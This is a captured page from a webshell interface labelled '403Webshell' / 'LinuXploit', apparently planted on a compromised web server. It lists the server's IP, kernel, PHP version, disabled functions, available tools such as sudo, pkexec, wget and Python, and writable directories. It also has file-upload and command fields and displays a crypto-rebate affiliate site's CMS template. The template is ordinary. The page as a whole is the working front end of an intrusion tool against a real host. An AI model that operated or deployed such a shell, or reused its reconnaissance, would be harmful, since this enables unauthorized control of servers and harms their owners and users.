403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/data/wwwroot/2026_06_14_01/template/dafeult/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/data/wwwroot/2026_06_14_01/template/dafeult/index.html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>{pboot:sitetitle}</title>
  <meta name="keywords" content="{pboot:sitedescription}" />
  <meta name="description" content="{pboot:sitekeywords}" />
  <link rel="stylesheet" href="static/vendor/swiper/swiper-bundle.min.css">
  <link rel="stylesheet" href="static/css/style.css">
</head>
<body>
  <header class="site-header">
    <div class="container header-inner">
      <a class="brand" href="/" aria-label="{pboot:sitetitle} home">
        <img src="{pboot:sitelogo}" alt="{pboot:sitetitle}">
      </a>
      <button class="menu-toggle" type="button" aria-label="Toggle menu" aria-expanded="false" aria-controls="main-nav">
        <span></span>
        <span></span>
        <span></span>
      </button>
      <nav class="nav-pill" id="main-nav" aria-label="Main navigation">
        <a href="#partners">Partner Platforms</a>
        <a href="#news">Campaigns & News</a>
        <a href="#about">About Us</a>
        <a href="#faq">FAQ</a>
        <a href="/#contact">Contact BD</a>
        <span class="language-switch ignore">
          <a href="{pboot:lgpath}&lg=cn" data-translate-reset>English</a>
          <button type="button" data-translate-to="chinese_traditional" style="white-space:nowrap">繁体中文</button>
        </span>
      </nav>
    </div>
  </header>

  <main>
    <section class="hero" id="top">
      <div class="container hero-content reveal">
        <h1>{label:home_title}</h1>
        <p>{label:home_subtitle}</p>
        <div class="hero-actions">
          <a class="btn btn-primary" href="{label:STARTEARNING}">START EARNING</a>
          <a class="btn btn-light" href="/#contact">CONTACT BD</a>
        </div>
      </div>
    </section>

    <section class="coin-strip" aria-hidden="true">
      <div class="container coin-track">
        <img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt="">
        <img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt=""><img src="static/imgs/qiu.png" alt="">
      </div>
    </section>

    <section class="section news-section" id="news">
      <div class="container"> 
        <div class="section-head reveal">
          <h2>Campaigns & News</h2>
          <a href="{pboot:sort scode=1}[sort:link]{/pboot:sort}">VIEW ALL <img src="static/imgs/aww.png" alt=""></a>
        </div>
        <div class="news-swiper swiper">
          <div class="news-grid swiper-wrapper">
          {pboot:list scode=1 num=9 order=date}
          <article class="news-card reveal swiper-slide">
            <div class="news-img">
              <img src="[list:ico]" alt="[list:title]">
            </div>
            <div class="news-body">
              <h3>[list:title]</h3>
              <p>[list:description]</p>
              <a href="[list:link]">Read More <img src="static/imgs/aww.png" alt=""></a>
            </div>
          </article>
          {/pboot:list}
          </div>
        </div>
        <div class="slider-dots"></div>
      </div>
    </section>

    <section class="section partners-section" id="partners">
      <div class="container">
        <div class="title-block reveal">
          {pboot:sort scode=2}
          <h2>[sort:name]</h2>
          <p>[sort:subname]</p>
          {/pboot:sort}
        </div>
        <div class="partner-grid">
          {pboot:list scode=2 num=999 order=sorting }
          <article class="partner-card reveal">
            <div class="okx"><img src="[list:ico]" alt="[list:title]"></div>
            <h3>[list:title]</h3>
            <small>[list:subtitle]</small>
            <strong>[list:ext_rebate]</strong>
            <p>[list:description]</p>
            <a href="[list:ext_link]">Connect Now <img src="static/imgs/aww.png" alt=""></a>
          </article>
          {/pboot:list}
        </div>
        <button class="expand-btn reveal" type="button">Expand <img src="static/imgs/Frame(4).png" alt=""></button>
      </div>
    </section>

    <section class="section about-section" id="about">
      <div class="container">
        <div class="title-block reveal"><h2>About Us</h2></div>
        <div class="about-grid">
          <article class="about-card small reveal"><h3>Fast Payout</h3><p>Daily / Weekly Settlements</p><img src="static/imgs/Group 279.png" alt="Fast payout"></article>
          <article class="about-card small reveal"><h3>Global Access</h3><p>Supporting Top 10+ Global Exchanges</p><div class="dot-matrix"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></div></article>
          <article class="about-card wide reveal"><img src="static/imgs/Group 278.png" alt="Best rates chart"><div><h3>Best Rates</h3><p>Up to <b>75%</b> Rebates</p></div></article>
          <article class="about-card wide reveal"><div><h3>All Campaigns, One Place</h3><p>No More Hunting Across Platforms</p></div><img src="static/imgs/image 6.png" alt="Campaign box"></article>
          <article class="about-card small reveal"><h3>24/7 Support</h3><p>Dedicated VIP Account Manager</p><img src="static/imgs/Rectangle 1149.png" alt="Support"></article>
          <article class="about-card small reveal"><h3>Non-Custodial</h3><p>Trade Directly <br>Full Fund Control</p><img src="static/imgs/image 8.png" alt="Non custodial"></article>
        </div>
      </div>
    </section>

    <section class="section steps-section">
      <div class="container">
        <div class="title-block reveal">
          <h2>3 Simple Steps</h2>
          <p>Your Crypto Journey Simplified. Create, Fund and Trade in Just 3 Effortless Steps.</p>
        </div>
        <div class="steps-grid">
          <article class="step-card reveal"><div class="step-media"><img class="step-bg" src="static/imgs/Group 218.png" alt=""><img class="step-figure" src="static/imgs/Rectangle 1150.png" alt="Choose exchange"></div><h3>Choose Your Exchange</h3><p>Select from our Partner Platforms List, <br>Click on Connect Now!</p></article>
          <article class="step-card reveal"><div class="step-media"><img class="step-bg" src="static/imgs/Group 218.png" alt=""><img class="step-figure" src="static/imgs/Rectangle 1151.png" alt="Sign up"></div><h3>Sign Up via Pyros</h3><p>Create a New Account With Our Exclusive Referral Link</p></article>
          <article class="step-card reveal"><div class="step-media"><img class="step-bg" src="static/imgs/Group 218.png" alt=""><img class="step-figure" src="static/imgs/Rectangle 1152.png" alt="Start trading"></div><h3>Start Trading &amp; Earn</h3><p>Your Cashback will be Automatically Credited on a Daily / Weekly Basis</p></article>
        </div>
      </div>
    </section>

    <section class="section faq-section" id="faq">
      <div class="container">
        <div class="title-block reveal">{pboot:sort scode=3}<h2>[sort:name]</h2>{/pboot:sort}</div>
        <div class="faq-grid reveal">
          <div class="faq-column">
            {pboot:list scode=3 num=3 order=sorting start=1}
            <div class="faq-item"><button>[list:title]<img class="plus" src="static/imgs/Group 182.png" alt=""></button><p>[list:description]</p></div>
            {/pboot:list}
          </div>
          <div class="faq-column">
            {pboot:list scode=3 num=3 order=sorting start=4}
            <div class="faq-item"><button>[list:title]<img class="plus" src="static/imgs/Group 182.png" alt=""></button><p>[list:description]</p></div>
            {/pboot:list}
          </div>
        </div>
      </div>
    </section>

    <section class="section contact-section" id="contact">
      <div class="container">
        <h2 class="reveal">Contact Support</h2>
        <form class="contact-grid reveal" action="{pboot:msgaction}" method="post">
          <input type="text" name="name" placeholder="Name" aria-label="Name">
          <input type="text" name="contacts" placeholder="Exchange of interest" aria-label="Exchange of interest">
          <textarea name="mianji" placeholder="Community size(est.)" aria-label="Community size"></textarea>
          <textarea name="huxing" placeholder="Platform (Telegram / Discord)" aria-label="Platform"></textarea>
          <textarea class="message" name="content" placeholder="Message" aria-label="Message"></textarea>
          <div class="contact-card orange"><strong>Telegram</strong><span>{label:Telegram}</span><small>Responds within 24h</small></div>
          <div class="contact-card"><strong>Twitter/ X</strong><span>{label:Twitter}</span></div>
          <button class="btn btn-primary submit" type="submit">SUBMIT <img src="static/imgs/aww.png" alt=""></button>
        </form>
      </div>
    </section>
  </main>

  <footer class="footer">
    <div class="container">
      <img class="footer-logo" src="{pboot:sitelogo}" alt="{pboot:sitetitle}">
      <div class="footer-line"></div>
      <div class="footer-meta">
        <span>{pboot:sitecopyright}</span>
        <span>{pboot:siteicp}</span>
      </div>
    </div>
  </footer>

  <button class="top-btn" type="button" aria-label="Back to top"><img src="static/imgs/Frame(5).png" alt=""><span>TOP</span></button>
  <script src="static/vendor/swiper/swiper-bundle.min.js"></script>
  <script src="static/vendor/translate/translate.js"></script>
  <script src="static/js/main.js"></script>
  <script src="static/js/translate-init.js"></script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit